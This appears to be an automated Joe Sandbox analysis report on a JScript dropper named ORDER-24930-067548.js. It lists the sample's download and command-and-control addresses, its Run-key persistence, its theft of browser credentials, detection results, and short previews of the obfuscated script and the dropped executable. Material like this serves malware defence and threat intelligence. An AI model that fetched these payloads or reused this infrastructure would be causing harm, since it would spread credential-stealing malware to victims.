              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1523152 Sample: ORDER-24930-067548.js Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 17 other signatures 2->65 8 wscript.exe 4 15 2->8         started        13 Service.exe 2->13         started        15 Service.exe 2->15         started        17 2 other processes 2->17 process3 dnsIp4 55 192.210.215.11, 49704, 80 AS-COLOCROSSINGUS United States 8->55 51 C:\Users\user\AppData\Local\Temp\OLWJMU.js, Unicode 8->51 dropped 53 C:\Users\user\AppData\Local\...\cc[1].js, Unicode 8->53 dropped 77 System process connects to network (likely due to code injection or exploit) 8->77 79 Benign windows process drops PE files 8->79 81 JScript performs obfuscated calls to suspicious functions 8->81 83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->83 19 wscript.exe 2 8->19         started        85 Antivirus detection for dropped file 13->85 87 Machine Learning detection for dropped file 13->87 89 Injects a PE file into a foreign processes 13->89 23 Service.exe 13->23         started        25 Service.exe 13->25         started        33 3 other processes 13->33 91 Creates multiple autostart registry keys 15->91 35 5 other processes 15->35 27 GeUT.exe 17->27         started        29 GeUT.exe 17->29         started        31 GeUT.exe 17->31         started        37 8 other processes 17->37 file5 signatures6 process7 file8 47 C:\Users\user\AppData\Local\TempbehaviorgrapheUT.exe, PE32 19->47 dropped 67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->67 39 GeUT.exe 2 4 19->39         started        signatures9 process10 file11 49 C:\Users\user\AppData\Roaming\Service.exe, PE32 39->49 dropped 69 Antivirus detection for dropped file 39->69 71 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 39->71 73 Machine Learning detection for dropped file 39->73 75 2 other signatures 39->75 43 GeUT.exe 1 26 39->43         started        signatures12 process13 dnsIp14 57 194.37.97.150, 49705, 6980 AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT Romania 43->57 93 Tries to harvest and steal browser information (history, passwords, etc) 43->93 signatures15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              ORDER-24930-067548.js30%VirustotalBrowse
              ORDER-24930-067548.js26%ReversingLabsScript-JS.Trojan.Cryxos

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\GeUT.exe100%AviraTR/Dropper.Gen
              C:\Users\user\AppData\Local\Temp\OLWJMU.js100%AviraJS/Dldr.G17
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\cc[1].js100%AviraJS/Dldr.G17
              C:\Users\user\AppData\Roaming\Service.exe100%AviraTR/Dropper.Gen
              C:\Users\user\AppData\Local\Temp\GeUT.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Service.exe100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://support.mozilla.org0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
              http://james.newtonking.com/projects/json0%VirustotalBrowse
              https://urn.to/r/sds_seeaCould0%VirustotalBrowse
              https://www.newtonsoft.com/jsonschema0%VirustotalBrowse
              194.37.97.1501%VirustotalBrowse
              https://urn.to/r/sds_see0%VirustotalBrowse
              https://github.com/LimerBoy/StormKitty1%VirustotalBrowse
              as525795.duckdns.org2%VirustotalBrowse
              https://www.nuget.org/packages/Newtonsoft.Json.Bson0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://192.210.215.11/zoom/cc.jstrue
                		unknown
                as525795.duckdns.orgtrueunknown
                194.37.97.150trueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabGeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drfalse
                • URL Reputation: safe
                		unknown
                http://192.210.215.11/zoom/cc.jwscript.exe, 00000000.00000003.1467024468.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1475994870.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1465964784.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466406423.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466341285.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  https://duckduckgo.com/ac/?q=GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoGeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drfalseunknown
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6lplaces.raw.5.drfalse
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.ecosia.org/newtab/GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brplaces.raw.5.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://urn.to/r/sds_seeaCouldGeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                    http://go.micGeUT.exe, 00000015.00000002.1819069957.0000000000925000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://james.newtonking.com/projects/jsonGeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                      https://ac.ecosia.org/autocomplete?q=GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://192.210.215.11/zoom/cc.jstwscript.exe, 00000000.00000002.1473794151.000002BDDF0C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466505372.000002BDDF0C0000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://github.com/LimerBoy/StormKittyGeUT.exe, 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchGeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.newtonsoft.com/jsonschemaGeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                        https://www.nuget.org/packages/Newtonsoft.Json.BsonGeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                        https://support.mozilla.orgplaces.raw.5.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://urn.to/r/sds_seeGeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGeUT.exe, 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        192.210.215.11
                        		unknownUnited States
                        		36352AS-COLOCROSSINGUStrue
                        194.37.97.150
                        		unknownRomania
                        		43913AT-AGES-ASAustrianAgencyforHealthandFoodSafetyATtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1523152
                        Start date and time:2024-10-01 07:37:14 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 58s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:34
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • GSI enabled (Javascript)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:ORDER-24930-067548.js
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winJS@52/22@0/2
                        EGA Information:
                        • Successful, ratio: 23.1%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 504
                        • Number of non-executed functions: 2
                        Cookbook Comments:
                        • Found application associated with file extension: .js

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target GeUT.exe, PID 3672 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 3772 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 5072 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 5252 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 5300 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 5664 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 5812 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 6148 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 6764 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 6960 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 1280 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 1344 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 1656 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 2772 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 3040 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 3184 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 4152 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 4352 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 4620 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 6324 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        01:38:22API Interceptor2486182x Sleep call for process: GeUT.exe modified
                        07:38:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Local\Temp\GeUT.exe
                        07:38:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\Service.exe
                        07:38:38AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Local\Temp\GeUT.exe
                        07:38:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\Service.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        192.210.215.11ORDER-249034489.XLS.jsGet hashmaliciousWSHRatBrowse
                        • 192.210.215.11/zoom/tm.vbs
                        ORDER-2490407.PDF.jsGet hashmaliciousSTRRATBrowse
                        • 192.210.215.11/zoom/java.js
                        MACHINE_SPECIFICATION.jsGet hashmaliciousWSHRatBrowse
                        • 192.210.215.11/zoom/tm.vbs
                        Bukti-Transfer.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 192.210.215.11/zoom/aus1.js
                        PURCHASE_ORDER.jsGet hashmaliciousAsyncRATBrowse
                        • 192.210.215.11/zoom/asyn.js
                        Invoice-No35197QASD.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 192.210.215.11/zoom/au2.js
                        Faktur-Pajak..vbsGet hashmaliciousUnknownBrowse
                        • 192.210.215.11/zoom/aus1.js
                        Faktur-Pajak..vbsGet hashmaliciousUnknownBrowse
                        • 192.210.215.11/zoom/aus1.js
                        Ref_87021929821US20240709031221656.jsGet hashmaliciousNanocoreBrowse
                        • 192.210.215.11/zoom/nano.js
                        INVOICE-..jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 192.210.215.11/zoom/au.js

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        AS-COLOCROSSINGUSAE1169-0106202.xlsGet hashmaliciousSnake KeyloggerBrowse
                        • 172.245.123.9
                        5UQ2Xybm0q.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                        • 107.173.4.16
                        SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 107.173.4.16
                        PI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                        • 104.168.7.7
                        SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                        • 172.245.123.6
                        PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                        • 104.168.7.7
                        PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                        • 104.168.7.7
                        PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 107.173.4.16
                        ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                        • 192.3.101.137
                        http://jeevankiranfoundationcenter.co.in/css/rrp.htmGet hashmaliciousKutakiBrowse
                        • 23.94.221.14
                        AT-AGES-ASAustrianAgencyforHealthandFoodSafetyATSG2MZDAaW4.elfGet hashmaliciousMiraiBrowse
                        • 194.37.64.64
                        huhu.mips.elfGet hashmaliciousMirai, OkiruBrowse
                        • 194.37.64.26
                        jew.x86.elfGet hashmaliciousMiraiBrowse
                        • 194.37.64.28
                        leOsd0cFAr.elfGet hashmaliciousMiraiBrowse
                        • 194.37.64.43
                        oHqZ0zT7DZ.elfGet hashmaliciousMiraiBrowse
                        • 194.37.64.57
                        ORDER-230733AF.pdf.vbsGet hashmaliciousWSHRat, AgentTeslaBrowse
                        • 194.37.97.161
                        QDXi1OHfgf.elfGet hashmaliciousMirai, MoobotBrowse
                        • 194.37.64.209
                        DluElZeE8W.elfGet hashmaliciousMiraiBrowse
                        • 194.37.64.69
                        UK4ouvcZEA.elfGet hashmaliciousMiraiBrowse
                        • 194.37.64.200
                        6Z8m42DCVd.elfGet hashmaliciousMiraiBrowse
                        • 194.37.64.62

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GeUT.exe.log

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):520
                        Entropy (8bit):5.355496254154943
                        Encrypted:false
                        SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                        MD5:3C255C75EA6EB42410894C0D08A4E324
                        SHA1:34B3512313867B269C545241CD502B960213293A
                        SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                        SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Service.exe.log

                        Download File
                        Process:C:\Users\user\AppData\Roaming\Service.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):520
                        Entropy (8bit):5.355496254154943
                        Encrypted:false
                        SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                        MD5:3C255C75EA6EB42410894C0D08A4E324
                        SHA1:34B3512313867B269C545241CD502B960213293A
                        SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                        SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\cc[1].js

                        Download File
                        Process:C:\Windows\System32\wscript.exe
                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (27355), with CRLF line terminators
                        Category:dropped
                        Size (bytes):1729444
                        Entropy (8bit):3.1698323653363847
                        Encrypted:false
                        SSDEEP:1536:Cz87aBaU8MENpImB8g0fCSjkXCR6cidzXXeF/LeKCO+RiboFN+LQ81fIgOz2ABPA:s87awfM2B85CSQSsXZXSeKGo7BvOiGI
                        MD5:C63888086E1646654A1E162FDE69C0FF
                        SHA1:8580DAFBFFE4D9B0D7E122127A455682AD2BD30E
                        SHA-256:262FB2E45F9B66956236F89F4CBEAC22EE3D011832263A28ED7F632A22AE87D7
                        SHA-512:DF2212775D03605673E6420EF74EC6C99FCDBF7E1DDE3287C97C634553F66FD084E0F38549134EC9E0FB8CEF4033BE92013A430AA7955F0C691F7EDFF02FCB66
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Preview:.././.C.o.d.e.d. .B.y. .P.j.o.a.o.1.5.7.8.........v.a.r. .w.d.f.f.B.M.d.p.w.u.;.....w.d.f.f.B.M.d.p.w.u. .=. .[.".".,.....".W.S.!.......................!.c..!.!.!.!."" .!."r.!.......................!.i..!.!.!.!."" .!."p.!.......................!.t..!.!.!.!."" .!."..S.!.......................!.l..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."p.(.!.......................!.0..!.!.!.!."" .!.").!.......................!.;..!.!.!.!."" .!."".,.....".".,.....".W.S.!.......................!.c..!.!.!.!."" .!."r.!.......................!.i..!.!.!.!."" .!."p.!.......................!.t..!.!.!.!."" .!."..S.!.......................!.l..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."p.(.1.!.......................!.0..!.!.!.!."" .!."!.......................!.0..!.!.!.!."" .!."!.......................!.0..!.!.!.!."" .!.").!.......................!.;..!.!.!.!."" .!."".,.....".".,.....".Z.r.!.

                        C:\Users\user\AppData\Local\Temp\GeUT.exe

                        Download File
                        Process:C:\Windows\System32\wscript.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):59904
                        Entropy (8bit):7.846014380238068
                        Encrypted:false
                        SSDEEP:1536:E8ZVRAKxLzsP5+tNJqqVOd39lS7OhRHgTy8:FRVxLzmEtNJRVOV9SOHH2y8
                        MD5:7284765CA4D2F85C487796F437B01822
                        SHA1:F1E51F7E021629857369888A16E201FB464B7A61
                        SHA-256:680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
                        SHA-512:17D1DF0DF786D7BFFF9EE7618EA0CC442804B03BD6F35F13F8BBE6DD7FFA581C663D724989038A163D9B3B116EEDEF198EE084A87B6E799A4C97984304469B32
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..f............................n.... ........@.. .......................@............@................................. ...K.......H.................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..B................P.......H........................#..|............................................0..........r...p(....s.......o....t......*..0..........s....&..+.(....,.*..X...2.*..0..........rC..p(.....r...p(......r...pr...p(......r...pr...p(......(......r+..po......rM..po....................(....o........rU..p..................o....&(....(.............o....(...........*...................*...0..'.......~....rW..po......r...pr...po.....o....*..0..........(....s......(....*"..o....*..0..".......~...

                        C:\Users\user\AppData\Local\Temp\Log.tmp

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:Generic INItialization configuration [WIN]
                        Category:modified
                        Size (bytes):64
                        Entropy (8bit):3.6722687970803873
                        Encrypted:false
                        SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                        MD5:DE63D53293EBACE29F3F54832D739D40
                        SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                        SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                        SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                        Malicious:false
                        Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                        C:\Users\user\AppData\Local\Temp\OLWJMU.js

                        Download File
                        Process:C:\Windows\System32\wscript.exe
                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (27355), with CRLF line terminators
                        Category:dropped
                        Size (bytes):1729444
                        Entropy (8bit):3.1698323653363847
                        Encrypted:false
                        SSDEEP:1536:Cz87aBaU8MENpImB8g0fCSjkXCR6cidzXXeF/LeKCO+RiboFN+LQ81fIgOz2ABPA:s87awfM2B85CSQSsXZXSeKGo7BvOiGI
                        MD5:C63888086E1646654A1E162FDE69C0FF
                        SHA1:8580DAFBFFE4D9B0D7E122127A455682AD2BD30E
                        SHA-256:262FB2E45F9B66956236F89F4CBEAC22EE3D011832263A28ED7F632A22AE87D7
                        SHA-512:DF2212775D03605673E6420EF74EC6C99FCDBF7E1DDE3287C97C634553F66FD084E0F38549134EC9E0FB8CEF4033BE92013A430AA7955F0C691F7EDFF02FCB66
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Preview:.././.C.o.d.e.d. .B.y. .P.j.o.a.o.1.5.7.8.........v.a.r. .w.d.f.f.B.M.d.p.w.u.;.....w.d.f.f.B.M.d.p.w.u. .=. .[.".".,.....".W.S.!.......................!.c..!.!.!.!."" .!."r.!.......................!.i..!.!.!.!."" .!."p.!.......................!.t..!.!.!.!."" .!."..S.!.......................!.l..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."p.(.!.......................!.0..!.!.!.!."" .!.").!.......................!.;..!.!.!.!."" .!."".,.....".".,.....".W.S.!.......................!.c..!.!.!.!."" .!."r.!.......................!.i..!.!.!.!."" .!."p.!.......................!.t..!.!.!.!."" .!."..S.!.......................!.l..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."p.(.1.!.......................!.0..!.!.!.!."" .!."!.......................!.0..!.!.!.!."" .!."!.......................!.0..!.!.!.!."" .!.").!.......................!.;..!.!.!.!."" .!."".,.....".".,.....".Z.r.!.

                        C:\Users\user\AppData\Local\Temp\places.raw

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):5242880
                        Entropy (8bit):0.03708713717387235
                        Encrypted:false
                        SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                        MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                        SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                        SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                        SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                        Malicious:false
                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\tmp4627.tmp.dat

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1373607036346451
                        Encrypted:false
